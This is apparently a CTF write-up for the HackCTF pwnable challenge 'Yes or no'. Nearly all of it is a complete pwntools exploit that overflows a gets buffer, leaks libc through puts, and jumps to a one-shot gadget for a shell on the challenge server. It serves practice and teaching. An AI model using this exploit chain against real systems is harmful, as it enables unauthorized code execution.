HackCTF/pwnable
HackCTF - Yes or no
shinobu
2021. 11. 21. 15:48
gdb로 확인해보면
값을 넣고 gets 를 이용해 rop 를 진행하면 된다
# Two-stage ret2plt exploit (pwntools, Python 2 API: str payloads and
# iterator .next()).  Stage 1 leaks the puts GOT entry to locate libc,
# stage 2 returns into a hard-coded libc offset.  Every constant below is
# bound to this exact binary and this exact libc-2.27.so build.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3009)
e = ELF('./yes_or_no', checksec=False)
libc = ELF('./libc-2.27.so', checksec=False)
# First prompt answer; the meaning of 9830400 is not shown on this page —
# presumably the value the binary checks before reaching gets (TODO confirm in gdb).
r.sendline('9830400')
r.recvuntil('me\n')
# 26 bytes of padding: presumably buffer-to-saved-return distance found in gdb — confirm.
payload = 'A'*26
payload += p64(0x0400883)        # gadget address in the binary; likely `pop rdi ; ret` (not shown here)
payload += p64(e.got['puts'])    # argument: address of the GOT slot holding puts
payload += p64(e.plt['puts'])    # puts(&got.puts) prints the resolved libc address
payload += p64(e.sym['main'])    # return to main so a second gets() overflow is possible
r.sendline(payload)
# puts emits 6 significant bytes of the 8-byte pointer; pad to 8 for u64.
leak = u64(r.recv(6)+ '\x00\x00')
libc_base = leak - libc.sym['puts']
# system and binsh are computed but never used; the final stage relies on oneshot instead.
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()
# Hard-coded libc offset chosen by the author; only valid for this libc-2.27.so build
# and for whatever register/stack constraints that gadget requires (not verified here).
oneshot = libc_base + 0x10a38c
# Second run of main: answer the prompt again, then overflow with the libc target.
r.sendlineafter('~!\n', '9830400')
payload = 'A'*26
payload += p64(oneshot)
r.sendline(payload)
r.interactive()
# Defender note: the leak works because the GOT is readable and the binary is
# non-PIE with fixed gadget addresses; Full RELRO, PIE and a stack canary
# (or replacing gets with a bounded read) would each break a step of this chain.